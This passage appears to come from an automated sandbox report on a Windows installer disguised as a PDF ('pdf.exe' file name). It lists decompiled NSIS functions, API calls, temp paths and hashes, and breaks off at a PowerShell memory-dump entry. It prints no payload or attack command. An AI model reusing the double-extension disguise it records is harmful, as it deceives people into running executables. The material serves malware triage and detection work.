                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: Text$ItemTimerWindowwsprintf
                    • String ID: verifying installer: %d%%
                    • API String ID: 1451636040-82062127
                    • Opcode ID: 6ba5b411ef68c51829428819e7017d5c81ae953b0e98e705536d86526161d061
                    • Instruction ID: 5dcbc7e61265fa74d5ef9682fa3fdbf8678ca9730cf8e6b661d314f23d035d2c
                    • Opcode Fuzzy Hash: 6ba5b411ef68c51829428819e7017d5c81ae953b0e98e705536d86526161d061
                    • Instruction Fuzzy Hash: 8201F47164020DAFEF149F64DD49FAA3B69BB04304F108039FA05B91D0DBB99955DB58
                    Function 00405B7D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004060C1: lstrcpynW.KERNEL32(?,?,00000400,004033BE,007A7A20,NSIS Error), ref: 004060CE
                      • Part of subcall function 00405B20: CharNextW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp,?,00405B94,C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp,C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp,?,?,C:\Users\user~1\AppData\Local\Temp\,004058D2,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405B2E
                      • Part of subcall function 00405B20: CharNextW.USER32(00000000), ref: 00405B33
                      • Part of subcall function 00405B20: CharNextW.USER32(00000000), ref: 00405B4B
                    • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp,C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp,?,?,C:\Users\user~1\AppData\Local\Temp\,004058D2,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405BD6
                    • GetFileAttributesW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp,C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp,C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp,C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp,C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp,C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp,C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp,?,?,C:\Users\user~1\AppData\Local\Temp\,004058D2,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 00405BE6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                    • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp
                    • API String ID: 3248276644-4148695969
                    • Opcode ID: 727da4a5fd54559f0b5fa84b8a7a338ed841983ac59879e6f1508895b9972b86
                    • Instruction ID: abcc44bb5ac455a12af884685492e3fe3933aadea98fff28ba48a73408b515ee
                    • Opcode Fuzzy Hash: 727da4a5fd54559f0b5fa84b8a7a338ed841983ac59879e6f1508895b9972b86
                    • Instruction Fuzzy Hash: 13F0D125110E5126D622373A1C85AAF3964CF8236071A023BF851B22D3DF3CB94289AE
                    Function 00405B20 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                    Download Yara Rule
                    APIs
                    • CharNextW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp,?,00405B94,C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp,C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp,?,?,C:\Users\user~1\AppData\Local\Temp\,004058D2,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405B2E
                    • CharNextW.USER32(00000000), ref: 00405B33
                    • CharNextW.USER32(00000000), ref: 00405B4B
                    Strings
                    • C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp, xrefs: 00405B21
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: CharNext
                    • String ID: C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp
                    • API String ID: 3213498283-879893010
                    • Opcode ID: d4fc8010274739b422e9c4851511b62dbacfb07d9cf0bff86c6d3941990f78f8
                    • Instruction ID: e578ad655b534d7df776be2fb65b6706c077aea2e5630ee55bcc1a6e0797be72
                    • Opcode Fuzzy Hash: d4fc8010274739b422e9c4851511b62dbacfb07d9cf0bff86c6d3941990f78f8
                    • Instruction Fuzzy Hash: 47F03021900A15A6DA3176584C45E77B7BCEB55760B04807BE611B72C0E7B878818EEA
                    Function 00405A75 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,004032FE,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403539), ref: 00405A7B
                    • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,004032FE,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403539), ref: 00405A85
                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405A97
                    Strings
                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405A75
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: CharPrevlstrcatlstrlen
                    • String ID: C:\Users\user~1\AppData\Local\Temp\
                    • API String ID: 2659869361-2382934351
                    • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                    • Instruction ID: d45e1729742e3aa2fdad34330c8206e26b696b323e0fb909c728dea942649628
                    • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                    • Instruction Fuzzy Hash: 25D05E61101A34AAC211AB448C04CDF76AC9E46304341402AF601B20A2C7785D5187EE
                    Function 00402E1E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(00000000,00000000,00402FFE,00000001,?,?,"C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe",004035A7,?), ref: 00402E31
                    • GetTickCount.KERNEL32 ref: 00402E4F
                    • CreateDialogParamW.USER32(0000006F,00000000,00402D98,00000000), ref: 00402E6C
                    • ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe",004035A7,?), ref: 00402E7A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                    • String ID:
                    • API String ID: 2102729457-0
                    • Opcode ID: eda6cdc1462fbc7416f633e785c39792dae7d5af29307ff631f073a815034cdd
                    • Instruction ID: ab31da6501661b9f66195f860ccdc22cbbd848d37c78d1f30a2074557711f0e0
                    • Opcode Fuzzy Hash: eda6cdc1462fbc7416f633e785c39792dae7d5af29307ff631f073a815034cdd
                    • Instruction Fuzzy Hash: 5BF0E230866A21ABC2206B24FE8CA9B7B64BB44B02700843BF084F11F4DB7C08D1CBCC
                    Function 00403BE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                    Download Yara Rule
                    APIs
                    • SetWindowTextW.USER32(00000000,007A7A20), ref: 00403C78
                    Strings
                    • 1033, xrefs: 00403BE4, 00403BEE, 00403C5F
                    • "C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe", xrefs: 00403BE1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: TextWindow
                    • String ID: "C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe"$1033
                    • API String ID: 530164218-1857685777
                    • Opcode ID: 25853dc5ba602574d3834410a2da63a6bfdd1c5e7c050dfff0ba9bdbe479cc15
                    • Instruction ID: 76c5e3d7d8337c2df2c2cf7c0ea0ef2dfca4284e7084803d1193080702a4905d
                    • Opcode Fuzzy Hash: 25853dc5ba602574d3834410a2da63a6bfdd1c5e7c050dfff0ba9bdbe479cc15
                    • Instruction Fuzzy Hash: BB11D136B486109BD7249F15DC40A377B6CEBC6716318C13FE802B7391DA3D9A029799
                    Function 00403875 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNEL32(?,771B3420,00000000,C:\Users\user~1\AppData\Local\Temp\,0040384D,00403663,?), ref: 0040388F
                    • GlobalFree.KERNEL32(00000000), ref: 00403896
                    Strings
                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403875
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: Free$GlobalLibrary
                    • String ID: C:\Users\user~1\AppData\Local\Temp\
                    • API String ID: 1100898210-2382934351
                    • Opcode ID: 513cb66aec3b184b1656533b532479dca3ec5b33ad4594f499a54eb9bf6dfc70
                    • Instruction ID: 4a5153cb0cb6d0fdaec4368861576d16cdbaaa85ae4e97bc048a47c982d0e917
                    • Opcode Fuzzy Hash: 513cb66aec3b184b1656533b532479dca3ec5b33ad4594f499a54eb9bf6dfc70
                    • Instruction Fuzzy Hash: BEE012334015305BC622AF54FE4475A77ACAF55B26F15817FF884BB26187B85C434BD8
                    Function 00405AC1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402EEE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe,C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe",004035A7,?), ref: 00405AC7
                    • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402EEE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe,C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe",004035A7,?), ref: 00405AD7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: CharPrevlstrlen
                    • String ID: C:\Users\user\Desktop
                    • API String ID: 2709904686-3976562730
                    • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                    • Instruction ID: 0b0a81fb3070cb4cf82837519cbc77f3171bffe5474af214e01851ba7d69d1ae
                    • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                    • Instruction Fuzzy Hash: 69D0A7B3510A30DFC712A704DC80D9F77ACEF5230074A442AE941A7161D7785C818AED
                    Function 00405BFB Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405EDC,00000000,[Rename],00000000,00000000,00000000), ref: 00405C0B
                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C23
                    • CharNextA.USER32(00000000,?,00000000,00405EDC,00000000,[Rename],00000000,00000000,00000000), ref: 00405C34
                    • lstrlenA.KERNEL32(00000000,?,00000000,00405EDC,00000000,[Rename],00000000,00000000,00000000), ref: 00405C3D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: lstrlen$CharNextlstrcmpi
                    • String ID:
                    • API String ID: 190613189-0
                    • Opcode ID: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                    • Instruction ID: 5c341d1775d35069f70a43f123e54e8e21aae2c79e6e03d0b51ab4281d394374
                    • Opcode Fuzzy Hash: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                    • Instruction Fuzzy Hash: A4F0C232108A58EFD7029FA5CD00D9FBBA8EF46350B2140B9E841F7310D634DE019FA8

                    Executed Functions

                    Function 07C6C228 Relevance: 19.2, Strings: 14, Instructions: 1706COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
